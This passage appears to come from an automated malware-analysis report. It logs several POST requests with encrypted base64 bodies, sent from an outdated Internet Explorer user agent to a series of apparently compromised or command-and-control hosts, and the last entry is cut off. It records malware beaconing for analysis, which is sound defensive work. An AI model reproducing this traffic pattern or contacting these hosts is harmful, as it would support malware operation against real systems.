7a 4b 31 32 4a 43 78 41 55 32 52 63 68 6c 66 65 79 30 2b 42 64 34 74 79 32 6a 6a 51 53 30 6e 4d 75 74 6e 43 61 38 5a 79 48 7a 67 31 47 65 4c 4e 66 79 39 63 7a 6a 67 79 79 6e 73 52 55 39 56 6c 34 61 2f 6f 71 62 46 69 74 31 53 48 6a 45 32 2f 48 35 67 68 6e 47 6f 62 57 4e 62 4e 4c 37 4d 50 52 4d 72 39 69 67 38 43 4f 72 68 2f 52 66 4e 77 50 50 56 6c 74 38 2b 2f 77 56 69 69 41 51 4e 62 64 4c 51 6c 4b 57 4b 30 68 59 5a 56 57 49 65 67 75 37 77 52 2f 44 65 49 46 7a 5a 57 61 51 6e 4b 2b 2b 38 63 59 43 63 34 4e 36 78 64 59 57 7a 57 73 78 7a 52 51 66 66 4e 32 41 36 51 37 42 37 43 30 4e 53 4d 49 36 73 75 4d 55 71 66 54 51 32 59 48 34 50 53 30 72 6e 57 6c 66 44 72 55 38 43 45 53 5a 64 57 56 69 32 58 53 39 50 72 44 6d 4c 34 46 4a 31 50 77 30 74 49 30 52 69 37 6c 50 69 6f 47 65 2f 6c 31 69 69 53 41 45 44 56 33 71 76 57 34 6c 67 53 62 53 47 4d 76 73 78 7a 62 68 35 69 56 34 5a 71 79 70 63 65 62 6f 77 3d Data Ascii: oBqtt2qNWpc839JCTV26zy2eGTKaAUE8Prb4q1CGnx0YOsefV0DH71Kl9ar7kGv6bJZUA1dqchHImckvcAYqIuxZJ3aho00dhlji4TNBQHyFrSrGjESxhJdP+uX/+Fex61Zyq+3cvIoFoYk58xlGif9nqiNPtDiGtHeoZ21JPyA340VXE7c+cD9xn7QkNdZLbaxYuD9KrxX1dflyMFzj+9TrPitx0+pxS80qiAhhiTQNQdRIva42Xe+l+DGM+9znUojoh+vToK2RZmCbUXOMtOVpzK12JCxAU2Rchlfey0+Bd4ty2jjQS0nMutnCa8ZyHzg1GeLNfy9czjgyynsRU9Vl4a/oqbFit1SHjE2/H5ghnGobWNbNL7MPRMr9ig8COrh/RfNwPPVlt8+/wViiAQNbdLQlKWK0hYZVWIegu7wR/DeIFzZWaQnK++8cYCc4N6xdYWzWsxzRQffN2A6Q7B7C0NSMI6suMUqfTQ2YH4PS0rnWlfDrU8CESZdWVi2XS9PrDmL4FJ1Pw0tI0Ri7lPioGe/l1iiSAEDV3qvW4lgSbSGMvsxzbh5iV4Zqypcebow=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 57 64 39 54 75 6e 57 6a 57 70 64 65 69 44 4a 47 33 4e 36 57 2f 32 34 66 66 41 6b 44 78 45 30 4c 65 64 38 62 6a 6a 56 7a 78 37 63 68 71 38 52 59 56 2f 78 37 75 51 41 32 46 76 51 69 2f 35 74 35 62 39 34 7a 45 77 67 48 36 41 6b 7a 66 54 38 67 56 76 53 2b 64 65 5a 53 6d 54 38 76 74 70 57 65 74 53 4d 6d 72 41 6e 61 4e 6e 63 51 69 71 63 68 44 51 6d 41 74 67 5a 48 4b 51 68 50 66 76 63 56 4b 6c 4d 6e 6e 43 4c 59 4b 43 66 37 69 56 31 64 4d 2b 37 4b 70 65 7a 35 79 57 5a 6a 37 6e 78 66 52 6f 43 73 62 4f 2f 6f 6b 51 41 51 64 5a 49 52 68 70 50 39 35 33 62 6b 61 34 50 78 31 73 35 32 6b 76 70 6e 41 41 50 6d 43 47 6f 4e 4b 69 6b 4f 36 6e 64 42 50 31 2b 4d 6a 7a 61 69 67 7a 31 39 54 71 4a 4d 68 42 45 6a 65 66 4d 4a 71 32 39 6e 4b 55 6a 75 4d 71 73 64 67 30 42 74 4a 41 65 6b 65 37 31 65 76 64 64 52 31 73 2b 4f 46 6e 79 42 49 4d 6a 62 6c 72 7a 64 36 6b 4c 51 35 55 65 4f 6a 36 52 77 5a 76 37 4c 68 54 4f 6f 67 53 43 73 38 62 46 59 44 2b 45 70 64 35 4b 76 35 6f 72 50 31 38 79 6f 77 58 73 6d 68 70 62 55 71 52 43 6c 68 54 2b 65 70 61 6e 38 62 74 51 53 58 76 6d 68 56 77 79 78 50 69 7a 2f 50 54 64 5a 78 77 67 61 31 47 78 4f 69 61 62 6c 67 76 2f 39 68 61 55 6f 39 78 6f 6d 35 6d 2f 36 41 6c 6a 6f 55 38 46 7a 6f 78 63 71 61 47 57 7a 41 57 4b 49 75 68 52 4b 63 46 38 6d 43 79 77 76 78 48 62 37 55 35 33 34 6f 4f 4f 73 45 48 62 51 50 51 2b 6a 59 73 69 65 2b 6e 47 4c 6e 33 42 45 68 6d 2f 6a 44 75 70 38 39 39 43 41 42 34 51 4a 49 43 56 45 2b 31 6c 52 44 47 74 37 33 51 4c 45 4d 50 54 4b 55 4b 46 66 4d 61 54 70 61 53 6c 4f 69 61 55 39 75 54 52 51 66 37 32 4f 50 61 31 31 41 2b 57 72 70 4b 76 41 5a 71 47 46 71 67 30 6a 58 46 58 46 4a 42 44 62 58 48 51 46 4c 77 58 62 6f 78 2f 44 73 4a 38 4d 58 34 53 66 7a 5a 62 34 57 7a 44 56 46 31 43 4e 71 43 42 44 36 67 3d 3d Data Ascii: Wd9TunWjWpdeiDJG3N6W/24ffAkDxE0Led8bjjVzx7chq8RYV/x7uQA2FvQi/5t5b94zEwgH6AkzfT8gVvS+deZSmT8vtpWetSMmrAnaNncQiqchDQmAtgZHKQhPfvcVKlMnnCLYKCf7iV1dM+7Kpez5yWZj7nxfRoCsbO/okQAQdZIRhpP953bka4Px1s52kvpnAAPmCGoNKikO6ndBP1+Mjzaigz19TqJMhBEjefMJq29nKUjuMqsdg0BtJAeke71evddR1s+OFnyBIMjblrzd6kLQ5UeOj6RwZv7LhTOogSCs8bFYD+Epd5Kv5orP18yowXsmhpbUqRClhT+epan8btQSXvmhVwyxPiz/PTdZxwga1GxOiablgv/9haUo9xom5m/6AljoU8FzoxcqaGWzAWKIuhRKcF8mCywvxHb7U534oOOsEHbQPQ+jYsie+nGLn3BEhm/jDup899CAB4QJICVE+1lRDGt73QLEMPTKUKFfMaTpaSlOiaU9uTRQf72OPa11A+WrpKvAZqGFqg0jXFXFJBDbXHQFLwXbox/DsJ8MX4SfzZb4WzDVF1CNqCBD6g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 57 6f 37 4c 75 6c 6d 6e 57 70 63 4e 6c 36 62 70 61 4f 68 6e 59 76 4b 63 78 47 43 33 76 33 6f 44 6e 63 39 6b 62 4e 78 69 76 4c 4c 55 38 6d 39 51 6e 64 39 4e 56 76 71 33 74 33 4a 79 38 7a 78 6f 71 4f 2b 46 66 61 39 76 39 43 63 57 58 52 65 68 67 66 55 64 69 4c 36 4a 74 63 59 35 52 78 50 6a 4f 76 41 4a 39 66 42 4d 74 69 32 6d 69 79 2f 51 31 6e 39 43 30 67 63 76 69 73 54 76 4a 4a 59 6e 74 6b 70 54 4b 61 79 6e 48 61 66 74 43 39 5a 65 2b 66 63 31 44 5a 30 41 4c 42 6e 45 39 58 5a 4c 56 7a 35 6f 71 77 59 62 32 57 50 55 58 4b 4c 42 6b 64 52 4e 49 6f 51 54 41 6a 2b 6d 71 48 44 4e 46 4b 63 57 43 66 4e 75 35 34 48 53 7a 63 72 72 48 4e 62 55 44 54 77 44 2b 50 78 39 66 6a 39 58 59 61 61 64 49 73 50 2b 74 73 46 43 44 6e 45 36 78 38 5a 66 70 68 74 36 34 35 79 33 36 30 50 4d 4a 70 2b 79 32 31 5a 6a 59 54 52 34 53 37 72 49 7a 52 42 56 2f 4d 2b 39 53 61 79 6b 57 2f 69 4a 47 79 7a 44 54 42 6f 42 66 50 6f 2f 2f 4f 38 4b 33 63 36 75 58 4b 32 61 39 61 6b 36 62 54 36 61 36 6f 5a 7a 2f 58 4b 53 4f 33 57 75 49 52 43 34 77 75 6b 35 35 44 51 2b 34 43 46 62 71 50 52 68 30 55 37 30 66 68 43 44 7a 6c 63 4a 4b 78 59 71 78 4a 66 41 32 68 43 2f 50 51 63 79 30 38 4e 41 59 74 6b 66 2b 47 61 47 67 44 33 6f 71 47 70 34 78 63 38 52 75 41 67 38 5a 71 46 69 37 39 7a 50 31 78 6a 76 2f 2b 6b 52 69 52 41 2b 51 32 56 70 2b 57 64 33 4e 64 34 6e 78 53 57 67 76 34 2b 54 55 52 48 4f 61 53 47 36 72 51 48 36 49 58 70 66 65 65 55 49 53 4f 48 2f 77 67 4a 73 39 31 6c 31 70 69 55 4b 72 46 59 58 62 65 2f 59 37 79 4a 72 69 6a 67 6c 43 7a 57 66 69 34 4a 62 63 6d 4a 45 4e 72 68 38 47 56 46 6d 54 36 6e 42 47 52 2b 74 50 46 34 72 64 50 6a 64 4c 30 6b 6c 69 47 59 53 64 6a 62 2f 55 4d 61 63 6f 6d 36 6a 6b 70 4d 70 41 4f 43 69 76 58 2b 37 75 71 59 4e 42 65 54 62 42 78 6a 34 2b 73 69 75 6f 6d 49 3d Data Ascii: Wo7LulmnWpcNl6bpaOhnYvKcxGC3v3oDnc9kbNxivLLU8m9Qnd9NVvq3t3Jy8zxoqO+Ffa9v9CcWXRehgfUdiL6JtcY5RxPjOvAJ9fBMti2miy/Q1n9C0gcvisTvJJYntkpTKaynHaftC9Ze+fc1DZ0ALBnE9XZLVz5oqwYb2WPUXKLBkdRNIoQTAj+mqHDNFKcWCfNu54HSzcrrHNbUDTwD+Px9fj9XYaadIsP+tsFCDnE6x8Zfpht645y360PMJp+y21ZjYTR4S7rIzRBV/M+9SaykW/iJGyzDTBoBfPo//O8K3c6uXK2a9ak6bT6a6oZz/XKSO3WuIRC4wuk55DQ+4CFbqPRh0U70fhCDzlcJKxYqxJfA2hC/PQcy08NAYtkf+GaGgD3oqGp4xc8RuAg8ZqFi79zP1xjv/+kRiRA+Q2Vp+Wd3Nd4nxSWgv4+TURHOaSG6rQH6IXpfeeUISOH/wgJs91l1piUKrFYXbe/Y7yJrijglCzWfi4JbcmJENrh8GVFmT6nBGR+tPF4rdPjdL0kliGYSdjb/UMacom6jkpMpAOCivX+7uqYNBeTbBxj4+siuomI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 47 5a 79 75 65 44 76 68 52 35 64 6e 4e 71 2b 76 30 75 57 56 6a 53 51 50 6e 59 78 42 4e 45 49 38 6e 34 62 50 76 71 7a 6d 4d 44 7a 33 4c 2f 53 6d 64 6d 6e 67 44 57 43 49 6a 39 33 65 30 74 5a 52 57 41 57 4a 70 33 33 7a 73 45 63 41 64 49 4e 63 35 54 70 49 71 47 56 41 7a 57 5a 43 4a 46 53 49 4f 35 52 54 79 53 33 37 2f 34 72 35 6e 55 6b 4a 45 5a 71 32 58 49 59 49 58 37 6f 53 54 4d 59 6e 76 47 70 43 6a 4d 33 4e 63 66 74 6a 48 4d 2f 38 48 70 35 62 59 6e 66 2b 52 4b 39 65 50 73 2b 78 67 36 74 72 47 70 70 73 51 48 72 55 4b 69 58 2f 62 30 72 59 41 64 68 58 71 48 6d 62 73 7a 58 61 57 4a 4a 63 50 71 47 6d 2b 68 6d 59 65 5a 56 51 66 4c 30 2f 6b 33 4b 50 42 39 39 72 34 54 79 35 6c 33 66 79 37 51 79 53 37 64 43 6a 55 6e 31 57 6d 61 4e 61 62 4f 46 61 5a 32 38 59 39 2b 30 45 76 32 76 4d 33 69 7a 68 59 6d 48 30 61 4f 4e 46 78 47 2f 41 48 31 76 4a 47 39 4d 66 74 64 31 59 4b 68 61 51 69 59 64 65 4d 4d 57 4c 56 32 46 53 43 56 74 6c 4d 47 6b 51 49 74 4d 45 69 2b 74 52 74 76 62 79 4e 79 62 52 46 6c 63 4e 42 41 47 32 63 44 49 77 36 53 74 4d 4d 61 37 66 65 61 63 48 7a 6e 4c 52 51 68 47 51 48 32 6a 2f 6b 4e 61 6f 56 2f 5a 36 77 64 31 59 56 4f 4f 6b 49 6d 69 4c 48 4d 62 68 66 41 43 64 68 69 34 79 37 35 65 62 34 65 49 5a 71 71 4d 57 2f 45 71 59 46 56 48 72 49 64 58 6d 64 35 64 4d 4a 31 6b 37 6f 31 58 31 53 4e 75 48 4a 47 67 6d 43 48 5a 33 6f 34 34 68 2f 58 31 4c 44 70 57 71 64 47 6d 63 66 47 2f 4d 31 43 65 43 55 4b 55 70 2b 56 78 37 6c 79 75 72 49 42 56 4d 6a 54 33 43 6b 54 7a 39 41 76 2f 34 52 70 5a 48 36 38 56 6e 61 4c 76 74 58 5a 59 71 36 68 55 63 4d 44 67 44 39 52 34 50 78 79 41 63 6f 58 4d 62 78 6b 6c 54 54 48 70 32 71 33 73 77 Data Ascii: GZyueDvhR5dnNq+v0uWVjSQPnYxBNEI8n4bPvqzmMDz3L/SmdmngDWCIj93e0tZRWAWJp33zsEcAdINc5TpIqGVAzWZCJFSIO5RTyS37/4r5nUkJEZq2XIYIX7oSTMYnvGpCjM3NcftjHM/8Hp5bYnf+RK9ePs+xg6trGppsQHrUKiX/b0rYAdhXqHmbszXaWJJcPqGm+hmYeZVQfL0/k3KPB99r4Ty5l3fy7QyS7dCjUn1WmaNabOFaZ28Y9+0Ev2vM3izhYmH0aONFxG/AH1vJG9Mftd1YKhaQiYdeMMWLV2FSCVtlMGkQItMEi+tRtvbyNybRFlcNBAG2cDIw6StMMa7feacHznLRQhGQH2j/kNaoV/Z6wd1YVOOkImiLHMbhfACdhi4y75eb4eIZqqMW/EqYFVHrIdXmd5dMJ1k7o1X1SNuHJGgmCHZ3o44h/X1LDpWqdGmcfG/M1CeCUKUp+Vx7lyurIBVMjT3CkTz9Av/4RpZH68VnaLvtXZYq6hUcMDgD9R4PxyAcoXMbxklTTHp2q3sw
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 76 45 68 4d 5a 48 73 6f 59 4a 63 50 42 4d 68 76 45 67 4e 31 4d 47 51 55 50 36 79 42 50 47 78 4f 33 35 6b 61 6f 73 30 70 53 49 43 59 44 75 48 2f 66 55 54 51 62 35 4b 7a 78 45 45 47 6c 64 2b 43 70 2f 66 31 70 65 33 38 43 72 41 54 57 48 5a 58 63 69 6c 67 39 6f 68 30 30 42 4d 53 49 32 34 55 6a 54 73 4d 61 77 53 79 6c 39 4e 6f 62 7a 62 66 64 5a 63 49 41 78 55 47 4b 47 79 30 4a 4d 36 4c 70 56 4a 51 4b 6c 78 6b 5a 38 69 43 79 48 74 43 36 47 34 59 67 7a 5a 73 33 4b 49 58 35 78 50 4a 61 74 6d 52 38 55 71 38 51 31 2b 56 62 59 43 68 77 38 75 64 49 75 47 52 5a 30 76 73 69 66 37 75 32 41 6a 77 2b 4d 70 59 68 6c 2b 6b 62 6a 32 39 53 41 4d 6c 72 4e 79 59 4e 48 4c 55 6b 4a 35 42 41 4f 4c 71 37 6a 6e 76 37 32 57 49 45 2b 77 46 58 61 66 5a 57 6f 51 58 4f 64 35 70 48 62 74 72 35 6a 53 58 46 4f 47 62 41 30 4d 41 50 79 7a 44 42 44 55 75 49 37 2b 44 4e 45 73 79 69 64 61 4a 6b 2b 35 65 42 2f 2b 55 39 79 34 78 34 33 6b 70 2b 61 6a 33 57 75 76 4b 43 6f 61 36 79 56 32 62 4d 52 34 45 6c 32 64 41 45 55 58 6b 45 71 63 72 2f 75 58 66 55 49 6d 75 4e 56 67 6b 79 72 52 47 5a 43 46 50 4d 7a 2b 65 36 4d 32 62 41 4a 5a 47 4d 54 31 77 68 35 72 2b 77 57 5a 68 50 78 54 6c 61 79 74 63 46 6d 75 71 35 46 41 77 34 78 65 2b 62 61 77 5a 4b 50 41 74 51 56 49 49 2f 74 74 68 6c 2b 36 73 6e 32 65 78 30 49 35 56 32 49 6a 2b 72 50 77 6e 50 38 52 53 4f 2f 78 67 49 47 4f 76 5a 78 49 63 54 69 63 50 45 62 63 59 76 78 48 39 38 35 46 6f 5a 45 39 70 79 6c 65 76 78 50 71 54 6f 78 62 64 4d 69 59 37 5a 36 5a 57 51 46 65 71 61 72 6c 61 53 56 32 4c 55 34 51 2f 72 75 43 75 71 38 46 45 2b 52 6c 47 67 49 52 53 30 68 47 4c 65 42 50 52 76 2f 78 6a 77 77 63 76 68 42 62 61 52 33 74 65 67 41 64 42 71 39 59 66 35 50 33 64 49 66 49 2f 37 36 67 6f 32 66 30 5a 63 50 44 59 6c 71 38 72 65 53 34 33 Data Ascii: vEhMZHsoYJcPBMhvEgN1MGQUP6yBPGxO35kaos0pSICYDuH/fUTQb5KzxEEGld+Cp/f1pe38CrATWHZXcilg9oh00BMSI24UjTsMawSyl9NobzbfdZcIAxUGKGy0JM6LpVJQKlxkZ8iCyHtC6G4YgzZs3KIX5xPJatmR8Uq8Q1+VbYChw8udIuGRZ0vsif7u2Ajw+MpYhl+kbj29SAMlrNyYNHLUkJ5BAOLq7jnv72WIE+wFXafZWoQXOd5pHbtr5jSXFOGbA0MAPyzDBDUuI7+DNEsyidaJk+5eB/+U9y4x43kp+aj3WuvKCoa6yV2bMR4El2dAEUXkEqcr/uXfUImuNVgkyrRGZCFPMz+e6M2bAJZGMT1wh5r+wWZhPxTlaytcFmuq5FAw4xe+bawZKPAtQVII/tthl+6sn2ex0I5V2Ij+rPwnP8RSO/xgIGOvZxIcTicPEbcYvxH985FoZE9pylevxPqToxbdMiY7Z6ZWQFeqarlaSV2LU4Q/ruCuq8FE+RlGgIRS0hGLeBPRv/xjwwcvhBbaR3tegAdBq9Yf5P3dIfI/76go2f0ZcPDYlq8reS43
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 6a 65 58 4b 65 77 73 38 61 5a 64 48 46 44 73 48 59 6d 48 47 74 33 54 43 78 43 78 52 50 34 69 79 62 2b 62 31 4a 76 4a 39 56 57 64 39 32 2b 2f 6d 74 37 78 64 6a 4d 74 4c 5a 64 65 6d 79 49 30 4e 38 33 66 4d 57 39 54 56 4b 30 74 70 61 41 4b 59 4e 66 5a 68 4d 39 67 47 5a 46 43 6f 69 42 2b 30 66 67 38 66 4b 59 35 49 36 79 4a 64 4c 64 6d 76 57 57 72 76 44 6c 67 33 57 33 4d 2f 59 4a 58 47 79 74 39 36 6c 6c 37 52 62 65 49 41 63 49 56 76 35 62 41 68 59 36 4c 42 36 66 50 33 45 51 6b 53 6a 52 7a 50 31 70 49 37 74 43 6b 4a 41 6d 66 5a 4f 44 5a 6e 35 2f 2b 59 79 35 70 4b 78 4a 68 55 65 79 77 63 65 55 43 39 49 53 43 30 44 69 6e 2f 68 34 43 51 7a 6d 48 6e 72 36 59 45 47 6b 70 65 6e 34 78 54 71 47 5a 45 34 38 4f 51 49 66 33 68 38 30 30 49 49 66 77 6d 71 42 4e 58 2b 44 6f 35 50 49 4c 38 42 39 34 39 67 70 4c 4f 49 44 49 46 49 35 56 59 61 42 63 4d 61 71 44 66 62 78 69 4c 6b 2f 4e 77 47 31 42 51 62 51 63 52 7a 57 62 33 6e 5a 32 54 4f 35 6e 4c 50 70 57 4b 31 54 57 4f 39 5a 4f 69 6d 71 72 64 37 31 45 5a 37 6f 36 72 2b 5a 65 6d 4e 56 2b 2b 76 4b 48 65 6f 61 34 35 51 2f 52 34 48 42 34 67 33 4a 64 6a 54 44 4e 61 52 74 46 4d 45 32 32 49 56 34 42 78 6c 46 6c 73 4e 57 56 72 61 77 66 32 57 6c 57 55 32 64 30 36 6f 43 65 71 39 49 65 6f 61 56 32 79 51 4b 41 43 35 72 4a 4d 38 51 49 75 64 6a 58 77 45 55 6a 4c 57 61 77 59 43 61 55 2b 54 47 6d 62 4b 59 52 34 79 54 70 7a 41 43 5a 71 61 44 4b 48 78 78 5a 4f 63 57 67 77 74 57 4b 57 4d 38 67 2f 65 6a 4a 68 71 77 62 4b 38 69 6d 75 32 46 54 75 59 36 35 34 59 4f 4e 7a 37 56 41 41 2b 4d 34 6e 62 4c 33 37 6b 62 67 42 6d 57 72 48 5a 30 56 2f 34 6b 6f 62 37 49 36 45 6b 72 4a 50 73 4f 42 6f 56 32 59 70 30 35 43 51 39 49 7a 7a 67 64 35 57 50 65 49 3d Data Ascii: jeXKews8aZdHFDsHYmHGt3TCxCxRP4iyb+b1JvJ9VWd92+/mt7xdjMtLZdemyI0N83fMW9TVK0tpaAKYNfZhM9gGZFCoiB+0fg8fKY5I6yJdLdmvWWrvDlg3W3M/YJXGyt96ll7RbeIAcIVv5bAhY6LB6fP3EQkSjRzP1pI7tCkJAmfZODZn5/+Yy5pKxJhUeywceUC9ISC0Din/h4CQzmHnr6YEGkpen4xTqGZE48OQIf3h800IIfwmqBNX+Do5PIL8B949gpLOIDIFI5VYaBcMaqDfbxiLk/NwG1BQbQcRzWb3nZ2TO5nLPpWK1TWO9ZOimqrd71EZ7o6r+ZemNV++vKHeoa45Q/R4HB4g3JdjTDNaRtFME22IV4BxlFlsNWVrawf2WlWU2d06oCeq9IeoaV2yQKAC5rJM8QIudjXwEUjLWawYCaU+TGmbKYR4yTpzACZqaDKHxxZOcWgwtWKWM8g/ejJhqwbK8imu2FTuY654YONz7VAA+M4nbL37kbgBmWrHZ0V/4kob7I6EkrJPsOBoV2Yp05CQ9Izzgd5WPeI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 52 62 7a 46 76 37 7a 51 57 70 65 48 51 6b 47 76 5a 33 53 53 66 55 2b 48 5a 32 4a 55 70 47 74 2f 73 4a 57 66 6e 44 63 6d 4c 70 30 71 52 7a 6d 71 75 33 73 45 65 57 42 44 55 72 67 79 48 30 41 75 73 73 67 6a 42 6c 48 72 42 33 52 2f 52 33 6c 70 6e 75 76 63 57 4f 62 79 67 6b 70 43 58 43 69 52 41 69 69 74 77 69 6b 32 6e 79 63 4c 39 78 44 47 70 41 75 39 67 71 2b 55 55 6a 69 6c 43 2b 64 59 5a 79 6f 6a 67 67 58 6a 42 6f 5a 54 45 71 4b 52 33 49 32 55 2b 5a 41 4f 51 61 61 42 44 30 5a 44 2b 66 4f 5a 59 2b 45 38 53 41 73 76 73 6d 6b 73 44 48 39 6d 46 4b 73 43 34 67 36 45 6c 65 4f 4c 39 75 46 36 67 57 45 58 43 6a 49 79 39 75 6f 48 4b 43 41 38 48 2b 76 6e 76 68 4e 49 64 67 48 52 67 66 48 37 4d 32 77 78 43 4e 74 68 68 6b 47 67 70 78 76 33 49 51 72 38 46 71 5a 62 48 79 78 53 32 45 43 59 46 75 6b 6e 4d 62 65 38 4d 51 62 78 6e 6b 56 73 7a 39 73 42 65 2f 6e 6d 70 56 42 39 42 31 53 57 34 52 4d 74 74 4d 4c 45 30 5a 74 54 38 4f 54 42 6a 50 76 4b 78 79 58 6b 68 43 39 75 42 74 58 4a 4a 4e 76 57 77 56 4c 79 62 2f 61 41 76 44 6a 5a 5a 47 54 53 69 75 72 30 79 75 68 36 48 72 5a 51 73 7a 55 77 6c 4e 4b 79 75 53 43 46 2f 75 46 37 37 4c 36 50 2b 6b 53 65 30 6c 33 6e 2f 4b 77 5a 34 50 2b 34 4e 47 62 2b 54 59 64 44 66 30 72 52 63 4c 47 2b 39 71 6d 32 50 38 65 38 76 6c 44 70 6f 65 66 31 32 56 64 73 41 46 74 77 75 59 47 4c 2b 33 37 6b 5a 32 48 39 69 56 59 46 72 66 39 55 52 78 36 65 4c 6d 48 54 30 2b 48 62 33 70 62 50 46 37 72 4f 76 41 62 2f 69 61 44 35 52 58 6c 69 55 6e 6c 68 36 42 53 72 50 76 6e 4c 62 54 73 6a 4b 4a 53 55 32 4c 55 59 5a 46 50 77 46 6e 39 79 44 6a 33 43 43 4a 43 33 58 64 38 33 51 55 66 48 74 52 48 58 79 4d 74 51 39 78 77 2f 4c 47 44 56 66 77 79 30 34 70 69 4d 77 58 64 47 46 38 73 58 4b 54 53 43 75 61 74 77 6f 55 71 70 7a 6d 77 45 71 46 37 54 64 38 65 43 53 41 6f 3d Data Ascii: RbzFv7zQWpeHQkGvZ3SSfU+HZ2JUpGt/sJWfnDcmLp0qRzmqu3sEeWBDUrgyH0AussgjBlHrB3R/R3lpnuvcWObygkpCXCiRAiitwik2nycL9xDGpAu9gq+UUjilC+dYZyojggXjBoZTEqKR3I2U+ZAOQaaBD0ZD+fOZY+E8SAsvsmksDH9mFKsC4g6EleOL9uF6gWEXCjIy9uoHKCA8H+vnvhNIdgHRgfH7M2wxCNthhkGgpxv3IQr8FqZbHyxS2ECYFuknMbe8MQbxnkVsz9sBe/nmpVB9B1SW4RMttMLE0ZtT8OTBjPvKxyXkhC9uBtXJJNvWwVLyb/aAvDjZZGTSiur0yuh6HrZQszUwlNKyuSCF/uF77L6P+kSe0l3n/KwZ4P+4NGb+TYdDf0rRcLG+9qm2P8e8vlDpoef12VdsAFtwuYGL+37kZ2H9iVYFrf9URx6eLmHT0+Hb3pbPF7rOvAb/iaD5RXliUnlh6BSrPvnLbTsjKJSU2LUYZFPwFn9yDj3CCJC3Xd83QUfHtRHXyMtQ9xw/LGDVfwy04piMwXdGF8sXKTSCuatwoUqpzmwEqF7Td8eCSAo=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 6b 4a 47 67 6d 37 56 45 61 70 66 6c 57 36 54 47 48 49 37 68 2b 61 36 53 77 4c 64 44 62 76 4e 72 75 54 53 32 4b 47 49 6d 46 47 6f 74 56 72 4e 56 76 55 4a 5a 31 6a 4e 67 73 71 66 38 35 2f 4b 63 4a 69 4a 7a 6f 2f 6b 49 62 31 49 61 38 79 78 47 47 48 46 43 2b 2f 70 6e 65 72 59 6c 2b 76 70 54 47 6c 78 54 72 6d 64 4f 61 45 34 63 52 35 2f 2f 66 39 39 33 6b 68 32 6d 59 7a 43 7a 77 73 5a 69 67 54 56 65 74 58 67 46 76 6f 71 46 51 45 33 2b 51 70 63 6e 2f 6c 32 37 73 78 43 6a 77 59 50 77 57 2b 4b 69 70 52 4c 54 33 6f 74 4d 68 52 78 53 4a 46 6a 6a 48 2b 41 31 49 69 4e 72 49 4e 30 6f 70 4c 78 46 63 64 57 45 35 61 5a 43 51 38 59 38 4c 5a 36 33 61 68 56 4d 2b 43 42 47 33 4e 5a 4c 50 78 57 42 62 4b 58 68 75 75 55 46 77 36 53 76 6d 6b 63 76 5a 6a 43 31 71 50 46 6b 75 6d 76 61 6e 61 63 55 4e 63 36 50 45 61 55 76 70 41 34 48 6a 33 31 61 74 39 33 32 75 6b 64 70 77 39 64 6f 77 4f 67 4d 75 6d 30 68 43 48 50 74 39 52 41 65 79 49 7a 70 4a 70 62 6b 32 52 6b 38 39 65 76 73 54 66 6d 32 41 6f 65 5a 74 58 54 65 2b 6c 57 4b 52 7a 6b 56 57 71 51 68 66 73 31 55 55 31 36 71 65 64 4b 67 55 2f 74 34 61 42 39 30 42 46 57 36 47 46 33 70 62 62 4e 56 48 68 50 47 36 63 55 69 77 68 52 50 70 36 52 45 49 56 4f 4f 43 64 45 77 74 47 74 69 47 63 48 59 67 51 53 44 4b 46 4b 31 78 64 57 64 6c 36 53 68 44 6c 5a 6c 6b 36 6f 49 61 46 62 79 4e 64 34 4c 31 32 2b 62 65 4b 49 41 43 55 6a 65 5a 70 7a 41 37 63 54 70 6e 78 63 55 47 6c 48 2b 4d 58 46 32 59 50 30 49 65 2b 7a 6a 45 47 66 5a 45 53 4f 46 72 31 43 5a 4f 51 79 70 63 6f 38 32 76 35 5a 35 75 66 56 41 49 39 75 67 4f 32 57 4b 71 39 52 5a 51 34 56 7a 6e 43 30 66 65 42 36 51 56 78 58 64 33 4f 67 30 41 54 38 41 6a 2f 53 6a 6f 58 69 6c 6d 50 74 49 5a 6d 34 3d Data Ascii: 